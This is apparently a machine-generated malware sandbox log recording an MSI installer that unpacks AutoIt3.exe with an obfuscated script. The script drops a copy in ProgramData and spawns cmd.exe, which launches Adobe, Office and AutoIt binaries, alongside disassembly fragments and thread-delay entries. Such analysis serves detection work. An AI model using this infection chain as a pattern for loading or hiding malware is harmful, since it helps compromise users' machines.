Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042806C push 00428098h; ret	9_2_00428090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004460F8 push 0044613Ah; ret	9_2_00446132
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043E098 push 0043E0C4h; ret	9_2_0043E0BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0044C0B4 push 0044C10Bh; ret	9_2_0044C103
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042C164 push 0042C272h; ret	9_2_0042C26A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004201D0 push 004201FCh; ret	9_2_004201F4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041E1F8 push 0041E21Eh; ret	9_2_0041E216
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042A27C push 0042A2EBh; ret	9_2_0042A2E3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0042A208 push 0042A279h; ret	9_2_0042A271
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041E2C4 push 0041E2EAh; ret	9_2_0041E2E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A2B0 push 0043A2DCh; ret	9_2_0043A2D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00444340 push 0044438Ch; ret	9_2_00444384
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A350 push 0043A37Ch; ret	9_2_0043A374
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A318 push 0043A344h; ret	9_2_0043A33C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A3C0 push 0043A3ECh; ret	9_2_0043A3E4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004443E4 push 00444410h; ret	9_2_00444408
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A3F8 push 0043A424h; ret	9_2_0043A41C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A388 push 0043A3B4h; ret	9_2_0043A3AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00444398 push 004443DAh; ret	9_2_004443D2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045A410 push 0045A4B6h; ret	9_2_0045A4AE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A4AC push 0043A4D8h; ret	9_2_0043A4D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004504BC push 00450509h; ret	9_2_00450501
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00458510 push 0045855Ch; ret	9_2_00458554
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045E5CC push 0045E5F8h; ret	9_2_0045E5F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045E594 push 0045E5C0h; ret	9_2_0045E5B8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041C640 push ecx; mov dword ptr [esp], edx	9_2_0041C642
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00440680 push 004406ACh; ret	9_2_004406A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00406764 push 004067B5h; ret	9_2_004067AD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00418708 push ecx; mov dword ptr [esp], ecx	9_2_0041870D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004588A4 push 004588D0h; ret	9_2_004588C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A8A4 push 0043A8D0h; ret	9_2_0043A8C8

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File created: C:\temp\AutoIt3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\fkeabad\Autoit3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDAD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3433.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -42141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -119333s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -38013s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -47979s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -58022s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -33161s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -44923s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -40647s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -117784s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7944	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 2788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8088	Thread sleep count: 144 > 30	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8076	Thread sleep count: 521 > 30	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -53266s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -100936s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -47690s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98379s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -74299s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98773s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -35309s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -34527s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -78150s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -70488s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -66239s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -73944s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -68690s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -34428s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -87931s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -90734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98794s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -90071s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -92014s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -70098s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -118782s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -68075s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -101240s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -52037s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -32379s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -76502s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -118775s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 6080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe TID: 3612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 4120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 3192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7120	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
